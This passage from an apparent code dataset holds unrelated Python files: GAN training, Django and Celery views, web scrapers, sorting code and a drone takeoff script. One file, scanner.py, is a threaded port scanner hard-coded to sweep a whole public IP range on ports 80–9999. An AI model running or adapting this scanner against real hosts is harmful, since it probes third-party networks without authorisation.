input_dict)\n )\n\n return results, inflows\n\n def write_results_to_yaml(self, results_dict, filename=None):\n if filename is None:\n filename = \"oli_results\"\n with open(f\"{filename}.yaml\", \"w\") as yamlfile:\n yaml.dump(results_dict, yamlfile)\n print(\n \"OLI results write to yaml successful. Check working directory for oli_results.yaml file.\"\n )\n","sub_path":"watertap/core/util/oli_api.py","file_name":"oli_api.py","file_ext":"py","file_size_in_byte":30141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"347195345","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom torch.utils.data import Dataset, DataLoader, RandomSampler\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.utils.data import Dataset, DataLoader, RandomSampler\nfrom typing import Tuple, List\n\nfrom model.generator import Generator\nimport argparse\nfrom pathlib import Path\nfrom data_utils.utils import Config, CheckpointManager, SummaryManager\nimport json\n\nfrom data_utils.vocab_tokenizer import Vocabulary\nfrom sklearn.model_selection import train_test_split\nfrom transformers import BertTokenizer, BertModel, AdamW, BertPreTrainedModel,get_linear_schedule_with_warmup,get_cosine_with_hard_restarts_schedule_with_warmup\nimport pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom model.discriminator import BertDiscriminator\nfrom model.seqgan import DiscriminatorDatasetReader, collate_fn, load_generator, save_generator, train_discriminator, evaluate_discriminator, prepaire_D_dataset, prepaire_D_optimizer, prepaire_D_scheduler\nfrom model.seqgan import load_discriminator, prepaire_G_dataset, train_generator, save_discriminator\n\nfrom model.optim import GradualWarmupScheduler\nfrom evaluate import evaluate\nfrom metric import acc\n\ndef train_discriminator_with_gen(discriminator, genenrator, real_data):\n genenrator.switch_mode('eval')\n data_itr = real_data.sample(frac=0.4)\n d_steps = 2\n for d_step in range(d_steps):\n # build the dataset of positive and negative samples\n inputs = []\n outputs = []\n for data in data_itr:\n print(data)\n qustion = str(data['question'])\n inputs.append(qustion)\n outputs.append(str(data['answer']))\n corpus = pd.DataFrame({'question':inputs,'answer': outputs}).sample(frac=1)\n BATCH_SIZE = 8\n train_iterator, dev_iterator = prepaire_D_dataset(corpus,genenrator, batch=BATCH_SIZE)\n # start training D\n EPOCH_NUM = 2\n optimizer = prepaire_D_optimizer()\n scheduler = prepaire_D_scheduler(optimizer, EPOCH_NUM, len(train_iterator))\n train_discriminator(discriminator, train_iterator, optimizer, scheduler)\n evaluate_discriminator(discriminator, dev_iterator)\n\ndef train_generator_with_discr(generator, discriminator, data_iterator, val_iterator, ignore_padid, tokenizer=None, checkpoint_manager=None):\n g_steps = 2\n losses = []\n loss_fn = nn.CrossEntropyLoss(ignore_index=generator.vocab.PAD_ID)\n for step in range(g_steps):\n BATCH_SIZE = 8\n # optim\n opt = optim.Adam(params=generator.parameters(), lr=generator.learning_rate) # torch.optim.SGD(params=model.parameters(), lr=model_config.learning_rate)\n # scheduler = ReduceLROnPlateau(opt, patience=5) # Check\n epoch_size = generator.config.epochs//20 # cut in half\n scheduler = GradualWarmupScheduler(opt, multiplier=8, total_epoch=epoch_size)\n for epoch in range(epoch_size):\n scheduler.step(epoch)\n # 1. generator produces samples pred[batch_size, seq_len, word_emb]\n dataset = generator.sample(data_iterator)\n print('sample finish')\n # 2. discriminator produces rewards [batch_size,reward] from the samples [batch_size, seq_len]\n D_iterater = prepaire_D_dataset(dataset,generator=None,shuffle=False)\n print('prepaire_D_dataset finish')\n # print(dataset['question'])\n rewards = discriminator.reward(D_iterater)\n print('reward finish: ', len(rewards), len(dataset))\n # 3. use pred[batch_size, seq_len, word_emb]; pred[batch_idx][t] is log(P(y_t|Y_1:Y_{t-1})) of sentence batch_idx conditioned on tokens 0:t-1\n # then compute the loss with the following formula\n # for t in [0:seq_len]:\n # loss = -pred[batch_idx][t]*Q[batch_idx]\n # loss/batch_size\n G_iterator = prepaire_G_dataset(dataset,tokenizer,shuffle=True,rewards=rewards)\n # print('len of train: ',len(G_iterator))\n loss, acc_val = train_generator(generator, G_iterator, opt, discriminator, ignore_padid, tokenizer)\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n generator.eval()\n val_summary = evaluate(generator.seq2seq, val_iterator, {'loss': loss_fn, 'acc':acc}, device, tokenizer)\n val_loss = val_summary['loss']\n tqdm.write('epoch : {}, step : {}, '\n 'tr_loss: {:.3f}, val_loss: {:.3f}, tr_acc: {:.2%}, val_acc: {:.2%}'.format(epoch + 1, step,\n loss,\n val_summary['loss'], acc_val,\n val_summary['acc']))\n \n state = {'epoch': epoch + 1,\n 'model_state_dict': generator.get_state_dict(),\n 'opt_state_dict': opt.state_dict()}\n checkpoint_manager.save_checkpoint(state,'seqGAN.tar')\n print('Loss: ',loss)\n losses.append(loss)\n print(losses)\n\ndef D_step(corpus, generator, discriminator, EPOCH_NUM, model_dir):\n train_iterator, dev_iterator = prepaire_D_dataset(corpus, generator)\n optimizer = prepaire_D_optimizer()\n scheduler = prepaire_D_scheduler(optimizer, EPOCH_NUM, len(train_iterator))\n losses = []\n history_acc = []\n last_acc = 0\n discriminator_dir = model_dir + '/../discriminator_model/'\n for i in range(EPOCH_NUM-1):\n print('=' * 50, f"EPOCH {i+1}", '=' * 50)\n tl = train_discriminator(discriminator, train_iterator, optimizer, scheduler)\n losses.append(tl)\n el,r = evaluate_discriminator(discriminator, dev_iterator)\n print(f"Train loss {tl}")\n print(f"accuracy {r}")\n print(f"Evaluate loss {el}")\n history_acc.append(r)\n # 
val_losses.append(l)\n # rocs.append(r)\n if last_acc= 255 or x4 == 0:\n x4 = 1\n if x3 >= 255 or x3 == 0:\n x3 = 1\n if x2 >= 255 or x2 == 0:\n x2 = 1\n x1 += 1\n else:\n x2 += 1\n else:\n x3 += 1\n else:\n x4 += 1\n return ip_list\n\nclass Scanner(Thread):\n def __init__(self, ip):\n Thread.__init__(Thread)\n self.ports = range(80, 9999)\n self.ip = ip\n #end constructor\n\n def run(self):\n for port in self.ports:\n ouvert = self.check_port(port)\n if ouvert:\n print(self.ip, port, ouvert)\n #end run\n\n def check_port(self, port):\n ouvert = True\n #AF_INET: IPv4 address or domain name\n #SOCK_STREAM: TCP\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n try:\n sock.connect((self.ip, port))\n except OSError as e:\n ouvert = False\n return ouvert\n #end check_port\n#end class Scanner\n\nips = ip_range("41.87.128.1", "41.87.159.255")\n\nsocket.setdefaulttimeout(15)\n\nMAX_THREADS = 500\n\nfor ip in ips:\n while active_count() >= MAX_THREADS:\n time.sleep(5)\n Scanner(ip).start()\n","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"591727491","text":"#!usr/bin/python\n\n\"\"\"Create a function to calculate the average processing time for importing flagstat data into a sqlite3 database.\"\"\"\n\nimport sys\nimport pprint as pp\nimport sqlite3\nimport os\n\ndef time_flagstat (timefile, db_dir):\n\n times = {}\n per_flagstat_times = []\n per_runfolder_times = []\n all_runfolders_times = []\n database_create_times = []\n\n with open(os.path.join(db_dir, 'average_time.txt'), 'w+') as timetext:\n timetext.write(\"\")\n\n with open (timefile) as file_handle:\n for line in file_handle:\n # strip out the spaces at the end of each line.\n fields = line.strip().split(\" \")\n if \"from\" in fields:\n per_flagstat_times.append(fields[-1])\n \n if \"runfolder\" in fields:\n per_runfolder_times.append(fields[-1])\n \n if \"all\" in fields and \"data\" in fields:\n with open(os.path.join(db_dir, 'average_time.txt'), 'a+') as timetext:\n timetext.writelines(\"time to import all runfolders: {}\\n\".format(fields[-1]))\n all_runfolders_times.append(fields[-1])\n\n if \"create\" in fields and \"database\" in fields:\n database_create_times.append(fields[-1])\n\n #print (per_flagstat_times)\n #print (per_runfolder_times)\n #print (all_runfolders_times)\n\n per_flagstat_time = sum([float(x) for x in per_runfolder_times])/len(per_flagstat_times)\n per_runfolder_time = sum([float(x) for x in per_runfolder_times])/len(per_runfolder_times)\n all_runfolders_time = sum([float(x) for x in all_runfolders_times])/len(all_runfolders_times)\n database_create_time = sum([float(x) for x in database_create_times])/len(database_create_times)\n\n with open(os.path.join(db_dir, 'average_time.txt'), 'a+') as timetext:\n timetext.writelines(\"number of flagstat imported: {}\\n average time taken to import one flagstat: {}\\n\".format(len(per_flagstat_times), per_flagstat_time))\n timetext.writelines(\"number of runfolders imported: {}\\n average time taken to import each runfolder: {}\\n\".format(len(per_runfolder_times), per_runfolder_time))\n timetext.writelines(\"number of times all runfolders imported: {}\\n average time taken to import all runfolders: {}\\n\".format(len(all_runfolders_times), all_runfolders_time))\n timetext.writelines(\"number of times database were created: {}\\n average time taken to create a database: 
{}\\n\".format(len(database_create_times), database_create_time))\n\n times[\"a_flagstat\"] = per_flagstat_time\n times[\"a_runfolder\"] = per_runfolder_time\n times[\"all_runfolders\"] = all_runfolders_time\n times[\"a_database\"] = database_create_time\n \n for key, value in sorted(times.items()):\n print (key, value)\n \n return times\n\ndef main(timefile):\n\n db_dir = os.path.dirname(os.path.abspath(timefile))\n\n # call the function to print the number to terminal and save them in average_time.txt\n time_flagstat(timefile, db_dir)\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n\n\"\"\"From terminal navigate to the directory where the script is stored, \n \n enter \"python average_time.py\", followed by the filepath to the time.txt file to calculate the average time taken to import flagstat data\n e.g. /mnt/storage/home/zhengt/djangoproject/djangoproject2/flagstat_db/time.txt\"\"\"\n","sub_path":"average_time.py","file_name":"average_time.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"294498070","text":"from django.db import models\nimport uuid\n\n\nclass CategoryManager(models.Manager):\n '''\n Manager for Category\n '''\n\n def get_queryset(self):\n return super(\n CategoryManager,\n self\n ).get_queryset().select_related('parent', 'channel')\n\n\nclass Category(models.Model):\n '''\n This model represent a category on databse.\n Categories can be any general or comprehensive division.\n E.g: Games > XBOX > Adventure...\n '''\n\n objects = CategoryManager()\n\n uuid = models.CharField(\n default=uuid.uuid4,\n unique=True,\n max_length=36\n )\n\n name = models.CharField(\n max_length=255,\n )\n\n channel = models.ForeignKey(\n 'Channel',\n on_delete=models.CASCADE\n )\n\n parent = models.ForeignKey(\n 'Category',\n blank=True,\n null=True,\n on_delete=models.CASCADE\n )\n\n created_at = models.DateTimeField(\n auto_now_add=True\n )\n\n class Meta:\n verbose_name = 'Category'\n verbose_name_plural = 'Categories'\n ordering = ('created_at', )\n\n def __str__(self):\n path = [self.name]\n next_parent = self.parent\n\n while next_parent is not None:\n path.append(self.parent.name)\n next_parent = next_parent.parent\n\n path.append(self.channel.name)\n\n return ' > '.join(path[::-1])\n\n\nclass ChannelManager(models.Manager):\n '''\n Manager for Channel\n '''\n\n def get_queryset(self):\n return super(\n ChannelManager,\n self\n ).get_queryset().prefetch_related('category_set')\n\n\nclass Channel(models.Model):\n '''\n This model represent a channel on databse.\n A channel is a way of making a product available.\n E.g: Submarino marketplace, Americanas marketplace...\n '''\n\n objects = ChannelManager()\n\n uuid = models.UUIDField(\n default=uuid.uuid4,\n unique=True\n )\n\n name = models.CharField(\n max_length=255,\n )\n\n created_at = models.DateTimeField(\n auto_now_add=True\n )\n\n class Meta:\n verbose_name = 'Channel'\n verbose_name_plural = 'Channels'\n ordering = ('created_at', )\n\n def __str__(self):\n return self.name\n","sub_path":"work-at-olist/channels/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"430140043","text":"\"\"\"\nJinja2 renderer and black formatter.\n\"\"\"\nfrom pathlib import Path\nfrom typing import Optional\n\nimport black\nfrom black import NothingChanged, InvalidInput\n\nfrom mypy_boto3_builder.constants import 
TEMPLATES_PATH, LINE_LENGTH\nfrom mypy_boto3_builder.service_name import ServiceName\nfrom mypy_boto3_builder.structures.package import Package\nfrom mypy_boto3_builder.jinja_manager import JinjaManager\n\n\ndef blackify(content: str, file_path: Path, fast: bool = True) -> str:\n    \"\"\"\n    Format `content` with `black` if `file_path` is `*.py` or `*.pyi`.\n\n    On error writes invalid `content` to `file_path` to check for errors.\n\n    Arguments:\n        content -- Python code to format.\n        file_path -- Target file path.\n        fast -- Whether to skip AST post-check.\n\n    Returns:\n        Formatted python code.\n\n    Raises:\n        ValueError -- If `content` is not a valid Python code.\n    \"\"\"\n    if file_path.suffix not in (\".py\", \".pyi\"):\n        return content\n\n    file_mode = black.FileMode(\n        is_pyi=file_path.suffix == \".pyi\", line_length=LINE_LENGTH\n    )\n    try:\n        content = black.format_file_contents(content, fast=fast, mode=file_mode)\n    except NothingChanged:\n        pass\n    except (IndentationError, InvalidInput) as e:\n        file_path.write_text(content)\n        raise ValueError(f\"Cannot parse {file_path}: {e}\")\n\n    return content\n\n\ndef render_jinja2_template(\n    template_path: Path,\n    package: Optional[Package] = None,\n    service_name: Optional[ServiceName] = None,\n) -> str:\n    \"\"\"\n    Render Jinja2 template to a string.\n\n    Arguments:\n        template_path -- Relative path to template in `TEMPLATES_PATH`\n        module -- Module record.\n        service_name -- ServiceName instance.\n\n    Returns:\n        A rendered template.\n    \"\"\"\n    template_full_path = TEMPLATES_PATH / template_path\n    if not template_full_path.exists():\n        raise ValueError(f\"Template {template_path} not found\")\n\n    template = JinjaManager.get_environment().get_template(template_path.as_posix())\n    return template.render(package=package, service_name=service_name)\n","sub_path":"builder/mypy_boto3_builder/writers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"83322169","text":"from spiderRedis import myredis as spider_redis\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport common\nimport sys\nfrom DB.Db import Db as mysql\n\n\n'''Consume data from the queue'''\ndef consumer(eqKey):\n\tlink = spider_redis.pop(eqKey).decode('ascii')\n\tprint(link)\n\tr = requests.get(link)\n\tsp = BeautifulSoup(r.text, 'lxml')\n\n\t# get the title\n\tapp_name = sp.find(\"div\", class_='apphub_AppName').text.replace('\\'','\\\\\\'').replace('\"','\\\"').strip()\n\t# get the description\n\tintro = sp.find(\"div\", class_='game_area_description').text.replace('\\'','\\\\\\'').replace('\"','\\\"').strip()\n\tappId = link.split('/')[4]\n\n\tdata = {\n\t\t\"appId\" : appId, \"app_name\" : app_name, 'intro' : intro, 'link' : link\n\t}\n\tdb = mysql(\"app\")\n\tdb.insert(data)\n\n\nif __name__ == \"__main__\":\n\tspider_redis = spider_redis.spiderRedis()\n\tif len(sys.argv) == 1:\n\t\tprint(\"请输入 要消费的队列 !\")\n\t\tprint(\"总共有这么几个队列:\")\n\t\tprint(spider_redis.smembers(common.eq_sets_key))\n\t\texit()\n\n\teqKey = sys.argv[1]\n\ti = 0\n\twhile True:\n\t\tif i == 0:\n\t\t\tprint(\"======================== 消费队列:%s ========================\" % eqKey)\n\n\t\tif i == 20:\n\t\t\ti = 0\n\t\telse:\n\t\t\ti += 1\n\n\t\tif spider_redis.getListLen(eqKey) == 0:\n\t\t\tprint(\"\t队列没有数据,休眠15秒...\")\n\t\t\ttime.sleep(15)\n\t\t\tcontinue\n\n\t\tconsumer(eqKey)\n\t\t","sub_path":"spider/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"85881409","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\n\nsetuptools.setup(\n    name=\"python_homie4\",\n    version=\"1.0.0\",\n    description=\"Homie 4.0.0 Implementation\",\n    author=\"Michael Cumming, Juuso Korhonen\",\n    author_email=\"mike@4831.com, juusokorhonen on github.com\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/juusokorhonen/python_homie4\",\n    keywords=[\"HOMIE\", \"MQTT\"],\n    packages=setuptools.find_packages(exclude=(\"tests\", \"examples\", )),\n    classifiers=[\n        \"Development Status :: 3 - Alpha\",\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    install_requires=[\n        \"paho-mqtt>=1.3.0\",\n        \"netifaces>=0.10.6\"],\n    extras_require={\n        'dev': [\n            'pycodestyle',\n            'flake8',\n            'pytest',\n            'pytest-flake8',\n            'pytest-pycodestyle',\n        ]\n    }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"412434919","text":"\"\"\"\nurl = http://www.jmfc.com.cn/index/caid-2/addno-1/page-1.html\ncity : 荆门\nCO_INDEX : 24\ncommunity count: 345\n\"\"\"\nfrom backup.comm_info import Comm, Building, House\nfrom backup.get_page_num import AllListUrl\nfrom backup.producer import ProducerListUrl\nimport requests, re\n\nurl = 'http://www.jmfc.com.cn/index/caid-2/addno-1/page-1.html'\nco_index = '24'\ncity = '荆门'\n\n\nclass Jingmen(object):\n    def __init__(self):\n        self.headers = {\n            'User-Agent':\n                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119Safari/537.36'\n        }\n\n    def start_crawler(self):\n        b = AllListUrl(first_page_url=url,\n                       request_method='get',\n                       analyzer_type='regex',\n                       encode='gbk',\n                       page_count_rule='>>>.*?href=\".*?page-(.*?)\\.html',\n                       )\n        page = b.get_page_count()\n        for i in range(1, int(page) + 1):\n            all_url = 'http://www.jmfc.com.cn/index/caid-2/addno-1/page-' + str(i) + '.html'\n            p = ProducerListUrl(page_url=all_url,\n                                request_type='get', encode='gbk',\n                                analyzer_rules_dict=None,\n                                current_url_rule=\"/html/body/div[5]/div[6]/div/div[2]/h3/a/@href\",\n                                analyzer_type='xpath',\n                                headers=self.headers)\n            comm_url_list = p.get_current_page_url()\n            self.get_comm_info(comm_url_list)\n\n    def get_comm_info(self, comm_url_list):\n        for i in comm_url_list:\n            try:\n                comm = Comm(co_index)\n                comm.co_id = '楼盘首页.*?aid-(.*?)/'\n                comm.co_name = 'class=\"ls\">(.*?)<'\n                comm.co_type = '物业类型(.*?)<'\n                comm.area = '区域所属:(.*?)<'\n                comm.co_green = '绿 化 率:(.*?)<'\n                comm.co_volumetric = '容 积 率:(.*?)<'\n                comm.co_build_type = '楼       层:(.*?)<'\n                comm.co_size = '占地面积:(.*?)<'\n                comm.co_build_size = '建筑面积:(.*?)<'\n                comm.co_develops = '开  发  商:<.*?target=\"_blank\">(.*?)<'\n                comm.co_address = '项目地址:(.*?)<'\n                data_list = comm.to_dict()\n                p = ProducerListUrl(page_url=i,\n                                    request_type='get', encode='gbk',\n                                    analyzer_rules_dict=data_list,\n                                    current_url_rule='colspan=\"3\" align=\"right\">(.*?)<', html, re.S | re.M)\n            ho_true_size_list = re.findall('width=\"35%\".*?房号:.*?(.*?)<', html, re.S | re.M)\n            ho_type_list = 
re.findall('width=\"35%\".*?房号:.*?(.*?)<', html, re.S | re.M)\n            for i in range(0, len(ho_name_list)):\n                try:\n                    house = House(co_index)\n                    house.ho_name = ho_name_list[i].strip()\n                    house.ho_true_size = ho_true_size_list[i].strip()\n                    house.ho_type = ho_type_list[i].strip()\n                    house.bu_id = bu_id\n                    house.insert_db()\n                except Exception as e:\n                    print(e)\n        except Exception as e:\n            print(e)\n","sub_path":"hilder_gv/crawler/jingmen_24.py","file_name":"jingmen_24.py","file_ext":"py","file_size_in_byte":5575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"212379384","text":"# TO-DO: complete the helper function below to merge 2 sorted arrays\ndef merge(arrA, arrB):\n    elements = len(arrA) + len(arrB)\n    merged_arr = [None] * elements\n\n    # Your code here\n    while None in merged_arr:\n        if not arrA:\n            popped = arrB.pop(0)\n            first_instance = merged_arr.index(None)\n            merged_arr[first_instance] = popped\n        elif not arrB:\n            popped = arrA.pop(0)\n            first_instance = merged_arr.index(None)\n            merged_arr[first_instance] = popped\n        elif arrA[0] < arrB[0]:\n            popped = arrA.pop(0)\n            first_instance = merged_arr.index(None)\n            merged_arr[first_instance] = popped\n        else:\n            # arrB[0] <= arrA[0]; popping from arrB here also covers the\n            # equal case, which previously caused an infinite loop\n            popped = arrB.pop(0)\n            first_instance = merged_arr.index(None)\n            merged_arr[first_instance] = popped\n\n    return merged_arr\n\n# TO-DO: implement the Merge Sort function below recursively\ndef merge_sort(arr):\n    # base case\n    if len(arr) == 0 or len(arr) == 1:\n        return arr \n    # recursive case\n    elif len(arr) == 2:\n        return merge([arr[0]], [arr[1]])\n    else: \n        middle = (len(arr) - 1) // 2\n        left = arr[:middle]\n        right = arr[middle:]\n        \n        return merge(merge_sort(left), merge_sort(right))\n\n    return arr\n\n# STRETCH: implement the recursive logic for merge sort in a way that doesn't \n# utilize any extra memory\n# In other words, your implementation should not allocate any additional lists \n# or data structures; it can only re-use the memory it was given as input\ndef merge_in_place(arr, start, mid, end):\n    swapped = False\n    \n    while True:\n        swapped = False\n        for i in range(start, end):\n            if arr[i] > arr[i + 1]:\n                arr[i], arr[i + 1] = arr[i + 1], arr[i]\n                swapped = True\n        if swapped == False:\n            break\n    \n    return arr\n\ndef merge_sort_in_place(arr, l, r):\n    # base case\n    if l < r: \n        middle = l + (r - l) // 2\n        merge_sort_in_place(arr, l, middle)\n        merge_sort_in_place(arr, middle + 1, r)\n        merge_in_place(arr, l, middle, r)\n\n    return arr\n","sub_path":"src/sorting/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"66647725","text":"# Cells with Odd Values in a Matrix\n\n# There is an m x n matrix that is initialized to all 0's. 
There is also a 2D\n# array indices where each indices[i] = [ri, ci] represents a 0-indexed location\n# to perform some increment operations on the matrix.\n\n# For each location indices[i], do both of the following:\n\n# Increment all the cells on row ri.\n# Increment all the cells on column ci.\n# Given m, n, and indices, return the number of odd-valued cells in the matrix\n# after applying the increment to all locations in indices.\n\n# Example 1:\n\n\n# Input: m = 2, n = 3, indices = [[0,1],[1,1]]\n# Output: 6\n# Explanation: Initial matrix = [[0,0,0],[0,0,0]].\n# After applying first increment it becomes [[1,2,1],[0,1,0]].\n# The final matrix is [[1,3,1],[1,3,1]], which contains 6 odd numbers.\n\nfrom typing import List\n\nclass Solution:\n    def oddCells(self, n: int, m: int, indices: List[List[int]]) -> int:\n        rows = [0 for num in range(n)]\n        cols = [0 for num in range(m)]\n        for index in indices:\n            rows[index[0]] += 1\n            cols[index[1]] += 1\n        result = 0\n        for i in range(n):\n            for j in range(m):\n                if (rows[i] + cols[j]) % 2 != 0:\n                    result += 1\n        return result","sub_path":"easy/cells_with_odd_values_in_a_matrix.py","file_name":"cells_with_odd_values_in_a_matrix.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"437973231","text":"\"\"\"\n\nNOTE: be sure to be using the latest dronekit. \nsudo pip uninstall dronekit\nsudo pip uninstall pymavlink\n\ncd dronekit-python\ngit pull\n\nsudo python setup.py build\nsudo python setup.py install\n\nBe sure the RASPI CAMERA driver is correctly activated -> type the following\nmodprobe bcm2835-v4l2 \n\n\n\"\"\"\nfrom os import sys, path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nimport time\nimport math\nimport argparse\n\n\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative, Command, LocationGlobal\nfrom pymavlink import mavutil\nfrom opencv.lib_aruco_pose import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--connect', default = '')\nargs = parser.parse_args()\n \n#--------------------------------------------------\n#-------------- FUNCTIONS \n#--------------------------------------------------\n#-- Define arm and takeoff\ndef arm_and_takeoff(altitude):\n\n    print(\"Arming motors\")\n    vehicle.mode = VehicleMode(\"GUIDED\")\n    vehicle.armed = True\n\n    while not vehicle.armed: time.sleep(1)\n\n    print(\"Taking Off\")\n    vehicle.simple_takeoff(altitude)\n\n    while True:\n        v_alt = vehicle.location.global_relative_frame.alt\n        print(\">> Altitude = %.1f m\"%v_alt)\n        if v_alt >= altitude - 1.0:\n            print(\"Target altitude reached\")\n            break\n        time.sleep(1)\n    \n#--------------------------------------------------\n#-------------- CONNECTION \n#-------------------------------------------------- \n#-- Connect to the vehicle\nprint('Connecting...')\n\nconnection_string = \"/dev/ttyS0\"\nbaud_rate = 921600\nvehicle = connect(connection_string, baud = baud_rate, wait_ready=True) \nprint('connected!')\n\n#--------------------------------------------------\n#-------------- CONNECTION \n#-------------------------------------------------- \narm_and_takeoff(1.5)\n\ntime.sleep(3)\n\nprint (\" --> Commanding to LAND\")\nvehicle.mode = \"LAND\"\n\n","sub_path":"scripts/arm_takeoff_to_test.py","file_name":"arm_takeoff_to_test.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"251045439","text":"def reverse(x):\n    res = 0\n    remain = abs(x)\n    while 
remain:\n res = res * 10 + remain % 10\n remain //= 10\n return res if x > 0 else -res\n\n\ndef main():\n val = 1019\n print(val)\n rev = reverse(val)\n print(rev)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"reverse_int.py","file_name":"reverse_int.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"364594715","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n# Create your views here.\nfrom pymysql import connect\nfrom sshtunnel import SSHTunnelForwarder\nfrom pymysql import connect\nfrom sshtunnel import SSHTunnelForwarder\n#from monitor.tasks import add\nfrom ZxWebTest import settings\nfrom mycelery.sms.tasks import send_sms,send_sms2\nfrom mycelery.cms2.tasks import chains_check\nfrom datetime import timedelta\nfrom datetime import datetime\n#from django_celery_beat.models import PeriodicTask #倒入插件model\n\n\n\n\ndef view(request):\n \"\"\"生产者\"\"\"\n ################################# 异步任务\n\n # 1. 声明一个和celery一模一样的任务函数,但是我们可以导包来解决\n #chains_check.delay()\n #send_sms.delay(\"110\")\n send_sms2.delay(\"119\")\n #send_sms.delay() #如果调用的任务函数没有参数,则不需要填写任何内容\n print('-------------')\n return JsonResponse({\"status\": 0})\n\n\n\n#\n# def crontab(request):\n#\n# ################################ 定时任务\n#\n# ctime = datetime.now()\n# # 默认用utc时间\n# utc_ctime = datetime.utcfromtimestamp(ctime.timestamp())\n# time_delay = timedelta(seconds=10)\n# task_time = utc_ctime + time_delay\n# result = send_sms.apply_async([\"911\", ], eta=task_time)\n# print(result.id)\n# return JsonResponse({\"status\": 'ok'})\n\n#\n# def cms2_task_list(request):\n# #page = request.GET.get('page');\n# # if page:\n# # page=int(page);\n# # else:\n# # page=1;\n#\n# tasks = PeriodicTask.objects.all()\n# print(tasks)\n# # paginator = Paginator(tasks, settings.PAGE_SIZE)\n# # task_list = []\n# return JsonResponse({\"data\":tasks})\n\n\n\n\n\n\n\ndef db_content(sql_sentence):\n server = SSHTunnelForwarder(\n ssh_address_or_host=('xxx', 22), # 指定SSH中间登录地址和端口号\n ssh_username='root', # 指定地址B的SSH登录用户名\n ssh_password='xxx', # 指定地址B的SSH登录密码\n remote_bind_address=('xxxx', 3306) # 指定最终目标C地址,端口号为mysql默认端口号3306\n )\n server.start()\n\n db = connect(\n host='127.0.0.1', # 此处必须是是127.0.0.1\n port=server.local_bind_port,\n user='xxx',\n passwd='xxxx',\n db='xxx')\n print(\"端口:\" + str(server.local_bind_port))\n\n cursor = db.cursor()\n # print(cursor)\n\n db.ping(reconnect=True)\n cursor.execute(sql_sentence)\n results = cursor.fetchall()\n # print(results)\n server.close()\n return results\n\n\ndef chains(request):\n results = db_content('xxx')\n if results:\n print('fail')\n list1 = list(results)\n list_result = []\n for i in list1:\n a = i.__str__().replace(',', '').strip('()')\n list_result.append(a)\n print(list_result)\n return JsonResponse({\"status\": 0, \"message\": list_result})\n else:\n return JsonResponse({\"status\": 0, \"message\": '无异常!'})\n\n\n\n\n\n\n","sub_path":"monitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"465409533","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport math\nimport sys\nimport codecs\n\nJOULE_PER_CAL = 4.184\n\nclass Atom:\n \"\"\"An atom class\"\"\"\n def __init__(self, charge, lj):\n self.charge = charge\n self.epsilon = lj[0]\n self.sigma = lj[1]\n\n def __str__(self):\n 
